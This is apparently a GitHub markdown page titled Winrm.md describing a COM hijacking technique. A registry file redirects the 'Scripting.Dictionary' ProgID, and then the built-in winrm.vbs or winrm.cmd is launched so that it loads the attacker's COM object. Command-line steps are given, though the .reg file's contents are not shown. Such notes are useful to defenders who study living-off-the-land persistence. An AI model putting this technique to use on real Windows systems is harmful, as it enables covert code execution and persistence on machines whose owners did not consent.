Skip to content

Latest commit

 

History

History
24 lines (13 loc) · 512 Bytes

Winrm.md

File metadata and controls

24 lines (13 loc) · 512 Bytes

Here, we can use Winrm.vbs to hijack COM by making "Scripting.Dictionary" invokes COM file in registry, Scripting.Dictionary is often refers to ProgID.

Instructions:


C:\>reg import "file.reg"
The operation completed successfully.

C:\>start C:\Windows\System32\winrm.vbs
Or 
C:\> start C:\Windows\System32\winrm.cmd

C:\>

21312313

Author